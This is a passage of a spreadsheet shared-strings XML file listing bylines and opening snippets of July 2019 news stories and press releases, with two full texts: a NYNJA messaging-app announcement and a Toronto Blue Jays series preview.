    <t>TORONTO, July 29, 2019 /PRNewswire/ - De Havilland Aircraft of Canada Limited ("De Havilland Canada") and Ethiopian Airlines ("Ethiopian")...</t>
  </si>
  <si>
    <t>La Jolla, CA, July 27, 2019 --(PR.com)-- TAG Bill Pay, a premier back-office accounting, financial reporting and bill pay firm for family...</t>
  </si>
  <si>
    <t>Brady MacDonald</t>
  </si>
  <si>
    <t>Disneyland admission cost $2.50 in 1955 compared to a $129 ‘regular’ park ticket today, an increase of 5,060%, according to the study.</t>
  </si>
  <si>
    <t>A fall in shares of Amazon and Facebook pulled the S&amp;P 500 and Nasdaq indexes lower on Monday as investors looked ahead to major tech...</t>
  </si>
  <si>
    <t>UNITED STATES, WASHINGTON (VOP TODAY NEWS) — General Sergei Rudskoy, commander of the General Directorate of Operations of the Russian...</t>
  </si>
  <si>
    <t>TERRE HAUTE, Ind. (WTWO/WAWV) – Since June 18th of this year, Vigo County Schools superintendent Dr. Rob Haworth has held 4 community...</t>
  </si>
  <si>
    <t>SIOUX CENTER, Iowa (KCAU)- Sioux Center is filling a need for additional senior residential living. A 9,000 square foot assisted living...</t>
  </si>
  <si>
    <t>New Vice President &amp; General Manager for newly founded India office brings market expertise to build employee-first culture of growth for...</t>
  </si>
  <si>
    <t>Irma Garcia</t>
  </si>
  <si>
    <t>Calton &amp; Associates Inc. purchased a new stake in shares of Great Southern Bancorp, Inc. (NASDAQ:GSBC) in the 2nd quarter, Holdings...</t>
  </si>
  <si>
    <t>Chelsea teenager Ethan Ampadu’s loan to RB Leipzig is the latest in a number of moves British players have made to the Bundesliga.</t>
  </si>
  <si>
    <t>ROBERT C. GREMMELS WAVERLY --- Fred Abraham deserves an amen for his July 21 column, urging pastors to speak out about “what is right and...</t>
  </si>
  <si>
    <t>Jane Austen</t>
  </si>
  <si>
    <t>Soccer Manager 2019 broke the sales record. The best result in the history of the series PPE.PL Portal Football Manager 2019 with over 2...</t>
  </si>
  <si>
    <t>/PRNewswire/ -- NYNJA Group Limited is pleased to announce that its Android Application NYNJA has been approved to the Galaxy App Store. Acceptance into the store ensures exposure to high quality Android users for Galaxy versions 7, 8, 9 &amp; 10. With Galaxy App users shown to be more engaged with their apps the Samsung ecosystem will promote the NYNJA App at main user entry points. Galaxy Apps "main pages" are the primary entry points with an emphasis on "Trending", "Exclusive" and "Top", most of which fit the Company's current app profile. With inclusion into the Samsung Galaxy realm, NYNJA has access to promotion elements that include badges and app banners which links particular app group pages with all select apps within the category group, harnessing a stronger link to business users. "The Samsung Galaxy App Store is one of the most important Android App Stores to be distributed in. We are honoured and excited to be approved and featured in the Galaxy App Store," said JR Guerrieri, Founder and CEO of NYNJA. As part of the Theme Store offering; NYNJA will undergo an evaluation to determine specific forms of promotional opportunities that are best suited for the brand and business model. NYNJA App variables, such as total number of product page visits, percentage of downloads out of total detail page visits and total projected revenue for future in-app purchase will all be assessed to attribute international Samsung Galaxy user acquisition initiatives. About NYNJA NYNJA is currently available for global commercial use and is available on at NYNJA.io and in the Apple AppStore and Google Play. In addition to standard messaging features, NYNJA features scheduled messaging and translation and transcription. NYNJA is global, integrated and secure across every platform and device, and lets users make free Internet calls and transfer calls to any other communication device. NYNJA's architecture features secure encryption of cloud data storage for saving messages, images and files, and features a beautifully designed and intuitive interface highlighted by the app's patent and patent-pending concentric wheel navigation system. The concentric wheel enables quick and easy navigation of the app using only one thumb and eliminates the use for back buttons. About NYNJA Group Limited NYNJA Group Limited is a Hong Kong-based company creating the first international cross-platform communications app with a built-in cryptocurrency marketplace and cryptocurrency wallet. The NYNJA app combines voice, text and visual messaging with robust business management and e-commerce features, all powered by its own financial ecosystem and cryptocurrency, NYNJACoin. With NYNJACoin, users can exchange freelance services and virtual goods, as well as access exclusive content and earn tokens for viewing ads or using branded material. Media Contact: Gary Yentin, App Promo 219095@email4pr.com 416-464-2223</t>
  </si>
  <si>
    <t>By Timothy Gardner and Patricia Zengerle</t>
  </si>
  <si>
    <t>By Timothy Gardner and Patricia Zengerle WASHINGTON (Reuters) - A U.S. Senate committee passed a bill on Wednesday to slap sanctions on...</t>
  </si>
  <si>
    <t>ZEINA KARAM Associated Press</t>
  </si>
  <si>
    <t>BEIRUT (AP) — An international music festival in Lebanon said Tuesday that it has cancelled a planned concert by a popular Mideast rock...</t>
  </si>
  <si>
    <t>The report studies the on global Game Engines Market status and forecast, categorizes the global Game Engines market size (value &amp; volume)...</t>
  </si>
  <si>
    <t>By JIM HEINTZ Associated Press</t>
  </si>
  <si>
    <t>MOSCOW (AP) — Russian police cracked down hard Saturday on demonstrators in central Moscow, beating some people and arresting hundreds of...</t>
  </si>
  <si>
    <t>BOSTON (AP) — Didi Gregorius and Austin Romine each hit a two-run homer off Chris Sale, and Domingo Germán struck out nine Sunday night to...</t>
  </si>
  <si>
    <t>Press Release Desk, News Partner</t>
  </si>
  <si>
    <t>From the Sacramento County Government: Sacramento County restaurant, The Kitchen recently became the first and only Michelin-starred...</t>
  </si>
  <si>
    <t>Nisa Investment Advisors LLC cut its holdings in shares of Dollar General Corp. (NYSE:DG) by 4.1% in the second quarter, according to the...</t>
  </si>
  <si>
    <t>Arcimoto, Inc.® (NASDAQ: FUV) — makers of the Fun Utility Vehicle® (FUV®), Rapid Responder™, and Deliverator™ — affordable, practical, and...</t>
  </si>
  <si>
    <t>TORONTO, July 29, 2019 /CNW/ - HyperBlock Inc. ("HyperBlock" or the "Company") (CSE: HYPR) is pleased to announce that its board of...</t>
  </si>
  <si>
    <t>Originally posted on https://thecorecenters.com/alcohol-and-drug-rehabilitation/ Drug or alcohol rehabilitation is often referred to...</t>
  </si>
  <si>
    <t>SYDNEY, Australia, July 26, 2019 (GLOBE NEWSWIRE) -- Immutep Limited (ASX: IMM; NASDAQ: IMMP) ("Immutep” or “the Company”), a...</t>
  </si>
  <si>
    <t>CNN Wire</t>
  </si>
  <si>
    <t>Posted 8:20 PM, July 30, 2019, by CNN Wire</t>
  </si>
  <si>
    <t>NEW YORK, July 25, 2019 /PRNewswire-PRWeb/ -- Top Inc., an advertising software company, announced the launch of their direct-to-consumer...</t>
  </si>
  <si>
    <t>By Paul Doyle and Jeff Jacobs</t>
  </si>
  <si>
    <t>UConn’s move from the American Athletic Conference to the Big East will be official July 1, 2020. A source said the school will announce...</t>
  </si>
  <si>
    <t>BOCA RATON, Fla., July 24, 2019 (GLOBE NEWSWIRE) -- ADT Inc. (NYSE: ADT) will release its second quarter 2019 financial results after the...</t>
  </si>
  <si>
    <t>Pune, India, July 30, 2019 (GLOBE NEWSWIRE) -- Overview: Market Research Future (MRFR) has published a research report on the global...</t>
  </si>
  <si>
    <t>Bayer AG , facing an upcoming trial in St. Louis over allegations that its Roundup weed killer causes cancer, has recruited Missouri-based...</t>
  </si>
  <si>
    <t>Hotsuit has continued in their pursuit of disrupting the sports fashion industry with the launch of the unique tech fashion sauna...</t>
  </si>
  <si>
    <t>by Rebekah Scanlan</t>
  </si>
  <si>
    <t>EXCLUSIVE Australian "influencer" Mikaela Testa hit the headlines this week after her tearful plea about Instagram's recent changes went...</t>
  </si>
  <si>
    <t>The Company is investing over $1 Million (USD) in the campaign including out-of-home placements across major markets to increase awareness...</t>
  </si>
  <si>
    <t>SOURCE: Viacom By Kelby Clark One of the most dangerous places in the developed world to give birth is the United States, and MTV wants to...</t>
  </si>
  <si>
    <t>NEW YORK, July 24, 2019 /PRNewswire/ -- Report Scope: This report covers the major sources of renewable energy as primary fuels:...</t>
  </si>
  <si>
    <t>Jon Kennard</t>
  </si>
  <si>
    <t>The category champions and their teams have finished the preliminary judging of the TJ Awards 2019 and the shortlist is now available.</t>
  </si>
  <si>
    <t>BOGOTÁ, Colombia, July 22, 2019 /PRNewswire/ -- Avianca Holdings S.A. (NYSE: AVH, BVC: PFAVH) today announced that, in connection with its...</t>
  </si>
  <si>
    <t>SCHUYLKILL HAVEN, Pa., July 22, 2019 /PRNewswire/ -- Earlier this month Todd Biever received his award as an inductee of the 2018-2019...</t>
  </si>
  <si>
    <t>Hannah Sparks</t>
  </si>
  <si>
    <t>Organisers recently announced the news on the festival's website and Facebook page: "Working as a not-for-profit collective takes a lot of...</t>
  </si>
  <si>
    <t>Rayonier Advanced Materials Inc. (NYSE:RYAM) plans to release its second quarter 2019 earnings on Wednesday, August 7, 2019 after the...</t>
  </si>
  <si>
    <t>WBI Investments Inc. reduced its position in shares of TEGNA Inc. (NYSE:TGNA) by 16.6% in the 2nd quarter, according to the company in its...</t>
  </si>
  <si>
    <t>The "Wax Market - Growth, Trends, and Forecast (2019 - 2024)" report has been added to ResearchAndMarkets.com's offering.</t>
  </si>
  <si>
    <t>Richard Themm, a graduate of the University of Toledo in Ohio and a children’s church pastor for 17 years, has completed his new book,...</t>
  </si>
  <si>
    <t>A serving police officer has been charged over an alleged incident last year. Officers from Northern Region have been investigating an...</t>
  </si>
  <si>
    <t>Jason Phelan</t>
  </si>
  <si>
    <t>Luke Beveridge is leaving the door ever-so-slightly ajar for a miracle, but the Western Bulldogs' coach knows deep down that scans will...</t>
  </si>
  <si>
    <t>Stock-index futures trade slightly higher Friday, with Wall Street on track to end a busy week for earnings on a positive note as investors...</t>
  </si>
  <si>
    <t>ABC/Randy HolmesBishop Briggs has announced a fall North American tour. The headlining run launches October 11 in Toronto, and concludes...</t>
  </si>
  <si>
    <t>BETH HARRIS (AP Sports Writer)</t>
  </si>
  <si>
    <t>GWANGJU, South Korea (AP) -- This time, Caeleb Dressel stands alone. The American won his record eighth medal at the world swimming...</t>
  </si>
  <si>
    <t>OCEANSIDE, Calif., July 22, 2019 /PRNewswire-PRWeb/ -- Nissan SuperGirl Pro Returns This Weekend Visitors can catch the best female...</t>
  </si>
  <si>
    <t>Texas Health Resources and Premier Inc. (NASDAQ: PINC) have formed a regional supply chain organization to further scale advancements in...</t>
  </si>
  <si>
    <t>By Morgan Chalfant</t>
  </si>
  <si>
    <t>Senate Intelligence Committee Chairman Richard BurrRichard Mauze BurrHillicon Valley: Senate Intel releases election security report | GOP...</t>
  </si>
  <si>
    <t>Originally posted on Pro Hockey Rumors</t>
  </si>
  <si>
    <t>The Tampa Bay Lightning are not only up against the NHL’s $81.5 million salary cap upper limit but also the league’s 50-contract limit....</t>
  </si>
  <si>
    <t>Netflix released a teaser trailer for Martin Scorcese’s “The Irishman” on Wednesday, offering an early glimpse of the “de-aging” visual...</t>
  </si>
  <si>
    <t>With the race to the AFL finals entering the home straight, Ross Lyon concedes Fremantle's lacklustre effort in a 47-point loss to the...</t>
  </si>
  <si>
    <t>Macworld | Jul 24, 2019 If you’re running iOS 13 or iPadOS 13, you can now use an PlayStation DualShock 4 controller to play MFi...</t>
  </si>
  <si>
    <t>Hollywood Production Center is celebrating Glendale Tech Week by hosting a gaming convention in partnership with Glendale Young...</t>
  </si>
  <si>
    <t>DCP Midstream LP</t>
  </si>
  <si>
    <t>DENVER, July 23, 2019 (GLOBE NEWSWIRE) -- DCP Midstream, LP (NYSE: DCP) announced today that the board of directors of its general...</t>
  </si>
  <si>
    <t>Duncan Rieder</t>
  </si>
  <si>
    <t>BANGOR is set to welcome a powerful female folk duo from across the pond this week. The globetrotting Lisa Maria and Amy Lou of Canadian...</t>
  </si>
  <si>
    <t>Gayle Clemans</t>
  </si>
  <si>
    <t>It all started with a backyard party. And now, festival:festival — a multi-arts event taking place Aug. 2-3 on Capitol Hill and in the...</t>
  </si>
  <si>
    <t>07/23/2019 1:27 (Adds comment from Mueller spokesman, background) WASHINGTON, July 22 (Reuters) - The U.S. Justice Department told former...</t>
  </si>
  <si>
    <t>July 23, 2019 01:52 PM WASHINGTON (AP) — Senate approves bill ensuring Sept. 11 victims' fund never runs out of money, sends measure to...</t>
  </si>
  <si>
    <t>Preschools &amp; Kindergartens</t>
  </si>
  <si>
    <t>Crystal Palace have completed the permanent signing of Ghana forward Jordan Ayew from Swansea. Ayew, 27, spent last season on loan at the...</t>
  </si>
  <si>
    <t>Jason Noble Local democracy reporter</t>
  </si>
  <si>
    <t>Plans to revamp a former dairy factory into new retail and leisure facilities have been given the green light - and could create up to 170...</t>
  </si>
  <si>
    <t>Police and ambulances raced to a shooting at a food festival in California on Sunday, and video posted on social media showed people at the...</t>
  </si>
  <si>
    <t>Sarah Mac Donald</t>
  </si>
  <si>
    <t>THE number of pilgrims who took part in the annual Reek Sunday climb of Croagh Patrick was up on previous years as a new path on the...</t>
  </si>
  <si>
    <t>LICT Corporation (“LICT” or the “Company”; OTC Pink®: LICT) reports financial results for the quarter ending June 30, 2019. SECOND QUARTER...</t>
  </si>
  <si>
    <t>PARIS (AP) — A Tour de France for the ages is getting a champion of an unusually young age: 22-year-old Egan Bernal, set to become South...</t>
  </si>
  <si>
    <t>CALGARY, July 23, 2019 /CNW/ - Sundial Growers Inc. ("Sundial" or the "Company") announced that it has launched an initial public offering...</t>
  </si>
  <si>
    <t>The global stretch marks treatment market size is projected to reach USD 3.9 billion by 2026, according to a new report by Grand View...</t>
  </si>
  <si>
    <t>By JANET HOOK;By LARRY NEUMEISTER and JIM MUSTIAN</t>
  </si>
  <si>
    <t>WASHINGTON The Democrats' raucous presidential debate Tuesday highlighted a fundamental choice facing the party in 2020: Whether to pick a...</t>
  </si>
  <si>
    <t>TORONTO, July 25, 2019 (GLOBE NEWSWIRE) -- Dividend Select 15 Corp. ("the Company") announces that its semi-annual financial statements...</t>
  </si>
  <si>
    <t>JACKSONVILLE, Fla., July 31, 2019 /PRNewswire/ -- Cannabis operator Revolution Florida, a sister company of Illinois-based Revolution...</t>
  </si>
  <si>
    <t>NEW YORK, July 29, 2019 /PRNewswire/ -- Women in Development (WiD), New York announces 2019-2020 40th Anniversary Year, with first...</t>
  </si>
  <si>
    <t>Bertha Hamada</t>
  </si>
  <si>
    <t>Primary Health Properties Plc (LON:PHP) Rating Reaffirmed Liberum Capital restate their Hold rating on Primary Health Properties Plc...</t>
  </si>
  <si>
    <t>Shareholder rights law firm Robbins Arroyo LLP announces that a purchaser of Vanda Pharmaceuticals Inc. (NASDAQ: VNDA) filed a derivative...</t>
  </si>
  <si>
    <t>Reportlinker</t>
  </si>
  <si>
    <t>NEW YORK, July 23, 2019 /PRNewswire/ -- Sewage Treatment Facilities Market Global Report 2019 provides the strategists, marketers and...</t>
  </si>
  <si>
    <t>GWS midfielder Tim Taranto has committed his future to the club, adding an extra two years to his current contract.</t>
  </si>
  <si>
    <t>/EIN News/ -- SAN CARLOS, Calif., July 26, 2019 (GLOBE NEWSWIRE) -- Iovance Biotherapeutics, Inc. (NASDAQ: IOVA), a late-stage...</t>
  </si>
  <si>
    <t>DUBLIN, July 24, 2019 /PRNewswire/ -- The "Global CAR-T Cell Therapy Market - Market Size, Forecasts, Trials &amp; Trends" report has been...</t>
  </si>
  <si>
    <t>LANCASTER, Pa., July 29, 2019 /PRNewswire/ -- Auntie Anne's®, the world's largest hand-rolled soft pretzel franchise, is partnering...</t>
  </si>
  <si>
    <t>EMERYVILLE, Calif., July 30, 2019 /PRNewswire-PRWeb/ -- The Academy of Interactive and Visual Arts has announced its selections for the...</t>
  </si>
  <si>
    <t>Fred Goodall, Ap Sports Writer</t>
  </si>
  <si>
    <t>Boston Red Sox designated hitter J.D. Martinez watches his three-run home run off Tampa Bay Rays starter Jalen Beeks during the third...</t>
  </si>
  <si>
    <t>from Daniel Maguire of the ABC David Schwimmer's character in "Friends" is a little bum, an inconvenient guy, but that makes Ross funny,...</t>
  </si>
  <si>
    <t>Written by Dana Sanchez</t>
  </si>
  <si>
    <t>Real estate isn’t hip-hop, but Suge Jacob Knight, 23, is stepping out of the shadow of his famous father and doing it his own way in a new...</t>
  </si>
  <si>
    <t>BEIJING (Reuters) - China's President Xi Jinping said the country's economic situation is good overall but warned that both global and...</t>
  </si>
  <si>
    <t>PORTAGE, Mich., July 29, 2019 (GLOBE NEWSWIRE) -- Two new NETA Self-Paced Technical Seminars (SPTS) make getting additional training and...</t>
  </si>
  <si>
    <t>CJC</t>
  </si>
  <si>
    <t>(WASHINGTON) -- President Donald Trump defended his ongoing attacks against Maryland Democratic Congressman Elijah Cummings, the city of...</t>
  </si>
  <si>
    <t>By Nigel F. Maynard</t>
  </si>
  <si>
    <t>Tamko Building Products says its new TW Seam Tape is designed to close sheathing gaps on the roof deck, offering an additional layer of...</t>
  </si>
  <si>
    <t>Thomas Hall</t>
  </si>
  <si>
    <t>Hopefully, someone has been watering the flowers for the Blue Jays. Since this is the first time since before the all-star break that the Blue Jays are back playing at the Rogers Centre. Canada’s team went just 4-6 during their ten-game road trip. The Blue Jays were actually able to win one of their three series during their road trip. The Blue Jays came close to sweeping the Tigers before the team headed back to the Six. A home run from Nicholas Castellanos in the 10th-inning was the only thing that kept the Blue Jays from recording their first series-sweep since late-April against the A’s. The Blue Birds will now attempt to win back-to-back series for the first time since April as well. Monday at 7:07 ET Since the Blue Jays decided to give Ryan Borucki an extra day of rest, he’ll now open this series against Cleveland. Borucki last pitched on July 16 with the Buffalo Bisons. Where he went six innings and gave up five hits, three runs, two home runs and recorded six strikeouts. Borucki has missed the entire season so far due to bone spurs in his pitching arm. At first, the Blue Jays and Borucki believed that he’d be able to pitch through them. But, those spurs required removal, which caused further delaying in Borucki’s season-debut. This is just the first time that Borucki is facing Cleveland in his career. Which means he should be able to create a lot of swings and misses against them. Mike Clevinger and his fantastic hair have been dominating opposing lineups ever since returning from the injured list. This month especially, the 28-year-old has been one of the best-pitchers in the entire league. Through three starts this month, Clevinger has allowed just two runs and struck out a combined 27 hitters over 17 innings. The Blue Jays have struck out the 5th-most among teams in the AL since the all-star break. So, they will likely have a very hard time supplying Borucki with much run support in this game. Tuesday at 7:07 ET Aaron Jacob Sanchez hasn’t won a game since April 27 against the A’s. He also hasn’t pitched six innings since June 8 as well. Sanchez’s latest outing against the Red Sox went just like all his others have gone this season. The 27-year-old surrendered four runs on eight hits in just five innings of work. What’s interesting is that Sanchez has allowed an extra-base hit in every single start since April 4. That start ironically came against these same Clevelanders. In that start, Sanchez went six innings and gave up just a pair of runs and created five strikeouts. So, hopefully a start against the Clevelanders will help shine a glimmer of hope for the severely struggling Sanchez. Trevor Bauer has had his name floating around in trade discussions dating all the way back to the offseason. But, it appears that barring a miracle, Bauer will be making this start against the Blue Jays. Which could actually be a good thing for the Blue Jays. The 28-year-old has uncharacteristically surrendered a lot of home runs lately. Bauer has given up a combined seven home runs over his last four starts. While those home runs haven’t stopped Bauer from creating strikeouts, they have hindered his ability to pitch late into games like he’s been accustomed to this season. Wednesday at 7:07 ET The Blue Jays will likely have a few roster changes to make before this game. Stro-Show is slated to start this game, but will likely be moved before the start of this game. With the way Stroman pitched during his latest outing, it wouldn’t surprise anyone to see him moved before his next start. Stroman went seven innings against the Yankees and held them to just six hits. If Stroman is moved, then the Blue Jays will likely call-up either Thomas Pannone(fantastic first name) or Sean Reid-Foley(please shave that ugly mustache). Growing up, Shane Bieber was almost always associated with the singer with the exact same name. But, the 24-year-old has certainly made a name for himself this season. Bieber(Shane not Justin) is currently pitching with a 3.69 ERA, 1.046 WHIP and a 2.3 WAR. The Beliebers in Cleveland definitely have a right to imagine Bieber as a big part of their future going forward. Bieber was also outstanding against the Blue Jays in his start against them earlier this season. He held them to just a pair of runs over six innings and also recorded nine strikeouts as well.</t>
  </si>
  <si>
    <t>Mumbai: Actress Kriti Sanon turned 29 on Saturday, and birthday wishes came pouring in from every corner, especially her friends in the...</t>
  </si>
  <si>
    <t>The 12-story building would be large enough to fit several thousand employees.</t>
  </si>
  <si>
    <t>William Hanson</t>
  </si>
  <si>
    <t>Investors sentiment decreased to 1.33 in Q1 2019. Its down 0.08, from 1.41 in 2018Q4. It dropped, as 27 investors sold EPR Properties...</t>
  </si>
  <si>
    <t>Tony Diver</t>
  </si>
  <si>
    <t>The mother of one of the Isil 'Beatles' is to challenge a government decision to share evidence with the United States without assurances...</t>
  </si>
  <si>
    <t>At the same time, wind energy could provide a future for all those workers in the energy sector currently facing layoffs because of the...</t>
  </si>
  <si>
    <t>FEDERAL politicians engrossed in their mobile phones during Question Time have earned the ire of members of a parliamentary committee...</t>
  </si>
  <si>
    <t>Rancho Cucamonga, California RANCHO CUCAMONGA, Calif. (AP) -- Trace Loehr hit a run-scoring double in the fourth inning, leading the...</t>
  </si>
  <si>
    <t>The United Nations’ nuclear watchdog has appointed senior official Cornel Feruta as its acting director-general pending the naming of a...</t>
  </si>
  <si>
    <t>Lisa Stevens</t>
  </si>
  <si>
    <t>Amateur investors can sometimes become overwhelmed by the speed and volatility of the stock market. Often times, avoiding big mistakes...</t>
  </si>
  <si>
    <t>The Council of Hotel and Restaurant Trainers (CHART) today announced that Jeff Chandler, CEO, Hopdoddy Burger Bar, Inc., is the recipient...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, July 30, 2019 (GLOBE NEWSWIRE) -- Hagens Berman Sobol Shapiro LLP reminds investors in Pivotal Software, Inc. (NYSE: PVTL)...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Democrats want incriminating, hidden-till-now details about Donald Trump and Russia. Republicans want Robert Mueller to...</t>
  </si>
  <si>
    <t>Cindy Reed</t>
  </si>
  <si>
    <t>The stock of Rubius Therapeutics, Inc. (NASDAQ:RUBY) is a huge mover today! The stock decreased 6.28% or $0.9 during the last trading...</t>
  </si>
  <si>
    <t>Tara Cosoleto</t>
  </si>
  <si>
    <t>A video has emerged of what appears to be a dead, skinned crocodile floating in the Murray River. Brent Lodge, who posted the video to his...</t>
  </si>
  <si>
    <t>PLEASANTON, Calif., July 29, 2019 /PRNewswire/ -- ServiceMax, the leading provider of cloud-based software for service execution...</t>
  </si>
  <si>
    <t>THE WOODLANDS, Texas, July 30, 2019 /PRNewswire-PRWeb/ -- The newest edition of Crystallography Times from Rigaku Corporation has been...</t>
  </si>
  <si>
    <t>Andy Grimm</t>
  </si>
  <si>
    <t>Yovani Lopez and his supporters claim they have a right to demand justice — publicly— for the slain teen mom and the couple’s child.</t>
  </si>
  <si>
    <t>PTC (Nasdaq: PTC) today announced that management will participate in the following conference in August. What: Oppenheimer 22nd Annual...</t>
  </si>
  <si>
    <t>Tony Cantu, Patch Staff</t>
  </si>
  <si>
    <t>An even greater police presence and enhanced lighting will be part of the mix after recent shootings in the central business district.</t>
  </si>
  <si>
    <t>ANCHORAGE, Alaska (AP) — Alaska Native and environmental groups are suing the U.S. Interior Department, saying it has withheld information...</t>
  </si>
  <si>
    <t>by Daniel Evans</t>
  </si>
  <si>
    <t>While our capital city is often a beacon of diversity and excellence in theatre, nowadays it’s not the only yardstick by which theatres...</t>
  </si>
  <si>
    <t>Originally posted on https://blog.printleaf.com/5-types-of-stickers-to-use-for-event-promotion/ Your posters are ready, you’ve got lots...</t>
  </si>
  <si>
    <t>Nanjing - Matthijs de Ligt scored an own goal 10 minutes into his first Juventus start before veteran goalkeeper Gianluigi Buffon inspired...</t>
  </si>
  <si>
    <t>PANAMA CITY, July 24, 2019 /PRNewswire/ -- Banco Latinoamericano de Comercio Exterior, S.A. ("Bladex" or the "Bank"; NYSE: BLX) announced...</t>
  </si>
  <si>
    <t>BEIJING, China and SAN JOSE, Calif., July 30, 2019 (GLOBE NEWSWIRE) -- Pixelworks, Inc. (NASDAQ: PXLW), a leading provider of advanced...</t>
  </si>
  <si>
    <t>Nicole Kennedy</t>
  </si>
  <si>
    <t>Deep Well Oil &amp; Gas (OTCMKTS:DWOG) and Extraction Oil &amp; Gas (NASDAQ:XOG) are both small-cap oils/energy companies, but which is the...</t>
  </si>
  <si>
    <t>Inspired by the legacy of his slain brother, Samuel “Sneed_Dagreat1” Simpson, has planned a 4 day event to give back to the Hollis...</t>
  </si>
  <si>
    <t>KOKOMO, Ind. (WXIN/Tribune/CNN) - A mother of four is frustrated after she says a lifeguard at a water park told her she couldn’t...</t>
  </si>
  <si>
    <t>PLANO, Texas, July 24, 2019 /PRNewswire/ -- LegacyTexas Financial Group, Inc. (Nasdaq: LTXB) (the "Company"), the holding company for...</t>
  </si>
  <si>
    <t>George Miller returned to the world of Mad Max again in 2015 with Mad Max: Fury Highway, an all-time nice motion movie that forged Tom...</t>
  </si>
  <si>
    <t>Staff Writer</t>
  </si>
  <si>
    <t>Exclusive provider for mainland China.</t>
  </si>
  <si>
    <t>President Donald Trump is suing the House Ways and Means Committee and New York state officials to prevent his state tax returns from being...</t>
  </si>
  <si>
    <t>ETF Trends</t>
  </si>
  <si>
    <t>By Robert Ross via Iris.xyz. The first generation of wireless—called 1G—rolled out in the 1980s. The only thing you could do with it was...</t>
  </si>
  <si>
    <t>BLOOMFIELD HILLS, Mich. (AP) _ Penske Automotive Group Inc. (PAG) on Tuesday reported second-quarter net income of $118.8 million. On a...</t>
  </si>
  <si>
    <t>PHOENIX (FOX 10) -- An Arizona man had a frightening experience while on vacation in Florida. Bill Angell has been boogie boarding in the...</t>
  </si>
  <si>
    <t>PRWeb</t>
  </si>
  <si>
    <t>Global law firm Greenberg Traurig, P.A. has added Shareholders Michael G. Taylor and Michael E. Strauch in the firm’s Miami office. Taylor...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, July 31, 2019 (GLOBE NEWSWIRE) -- Swift Navigation , a San Francisco-based tech firm providing centimeter-accurate...</t>
  </si>
  <si>
    <t>Jeff Blackburn, one of the most senior executives at Amazon, is taking a one-year leave.</t>
  </si>
  <si>
    <t>Helen Vnuk</t>
  </si>
  <si>
    <t>Until two weeks ago, model Carissa Pinkston was best known for her freckles. The redhead had been featured in Vogue as one of five models...</t>
  </si>
  <si>
    <t>Five-time All-Star Troy Tulowitzki announced his retirement on Thursday after injuries again derailed another season. Tulowitzki, 34, was...</t>
  </si>
  <si>
    <t>Police officers searching for swimmers who went missing during the UK’s heatwave have found two bodies. A body was recovered on Tuesday...</t>
  </si>
  <si>
    <t>Pune, India, July 31, 2019 (GLOBE NEWSWIRE) -- Overview: Market Research Future has published a research report that is estimated to grow...</t>
  </si>
  <si>
    <t>Focusing in on technical signals for Tactile Systems Technology Inc (TCMD), we have noted that the short-term moving average Hilo channel...</t>
  </si>
  <si>
    <t>BURLINGTON, N.C. (AP) -- Jay Charleston hit a walk-off single with one out in the eighth inning, as the Burlington Royals beat the Bristol...</t>
  </si>
  <si>
    <t>“Brand Protection Software Market”WiseGuyReports.com adds “Brand Protection Software Market 2018 Global Analysis, Growth, Trends and...</t>
  </si>
  <si>
    <t>CRA International (NASDAQ:CRAI) is scheduled to release its earnings data before the market opens on Thursday, August 1st. Analysts expect...</t>
  </si>
  <si>
    <t>Travis Bruno</t>
  </si>
  <si>
    <t>Fans of Overwatch have wondered just what type of hero would be joining the game next and now we have our answer. Blizzard has announced...</t>
  </si>
  <si>
    <t>Amy Feinstein</t>
  </si>
  <si>
    <t>Singer John Legend usually remains calm and reserved when it comes to sharing his thoughts, even about Donald Trump, but the weekend...</t>
  </si>
  <si>
    <t>Aimee Kalnoskas</t>
  </si>
  <si>
    <t>July 25, 2019 By Aimee Kalnoskas Leave a Comment The MAX31341B nanoPower real-time clock (RTC) from Maxim Integrated Products, Inc....</t>
  </si>
  <si>
    <t>Diamond Coating Epoxy Flooring Toronto Offers Top Garage Epoxy Floors</t>
  </si>
  <si>
    <t>Brenda Bartman</t>
  </si>
  <si>
    <t>VeriBlock (CURRENCY:VBK) traded up 1.7% against the US dollar during the 1 day period ending at 0:00 AM Eastern on July 28th. VeriBlock has...</t>
  </si>
  <si>
    <t>A group of U.S. Democratic lawmakers on Monday criticized Goodyear Tire &amp; Rubber Co for refusing to let them visit its Mexican plant, and...</t>
  </si>
  <si>
    <t>AVERILL PARK, N.Y., July 30, 2019 /PRNewswire-PRWeb/ -- According to Leonard Perlmutter, founder of The American Meditation Institute...</t>
  </si>
  <si>
    <t>Odonate Therapeutics, Inc. (NASDAQ: ODT), a pharmaceutical company dedicated to the development of best-in-class therapeutics that improve...</t>
  </si>
  <si>
    <t>Matt Stypulkoski</t>
  </si>
  <si>
    <t>Jets head coach Adam Gase spoke about his team’s enthusiasm as players reported for training camp on Wednesday.</t>
  </si>
  <si>
    <t>A postbox painted gold in honour of Andy Murray’s 2012 Olympics triumph has been knocked down by a car. Pictures on social media showed...</t>
  </si>
  <si>
    <t>Donald Trump won Michigan in 2016 by the slimmest of margins. Can he do it again in 2020? Polls are pointing to trouble for the president.</t>
  </si>
  <si>
    <t>Andrew Fifita’s Sharks teammates say the prop is determined to atone for his suspension with a stirring efficiency on his return towards...</t>
  </si>
  <si>
    <t>Tottenham are entering a new chapter under boss Mauricio Pochettino and this one promises to be the best yet.</t>
  </si>
  <si>
    <t>Lindsey Getz</t>
  </si>
  <si>
    <t>As a landscape business owner, you’re probably always looking for tools and processes to help you run your business better. More...</t>
  </si>
  <si>
    <t>Philip Bump, The Washington Post</t>
  </si>
  <si>
    <t>It was an older man at a town hall meeting in South Carolina in 2009 who apparently kicked off one of the intractable phrases of modern...</t>
  </si>
  <si>
    <t>Edlio, LLC., a leading provider of community engagement solutions for K-12 public, private and charter schools, announced a strategic...</t>
  </si>
  <si>
    <t>The Music Students Service League of Contra Costa collaborated with Macy's Walnut Creek from May 1-15, to hold the Round-Up for Rett...</t>
  </si>
  <si>
    <t>Aerospec</t>
  </si>
  <si>
    <t>Production has begun on the first nanosatellites to be operated for internet-of-things applications by Kineis, a startup created last year...</t>
  </si>
  <si>
    <t>Anthem Inc shares fell as much as 4% on Wednesday after the U.S. health insurer missed Wall Street expectations for a key medical cost...</t>
  </si>
  <si>
    <t>SEATTLE, July 24, 2019 /PRNewswire/ -- Redfin Corporation (NASDAQ: RDFN) today announced that Chief Financial Officer Chris Nielsen will...</t>
  </si>
  <si>
    <t>With the summer reaching its peak, Incheon International Airport is hosting ‘Timeless Summer Concert’ from July 24 to 26 at Incheon Airport...</t>
  </si>
  <si>
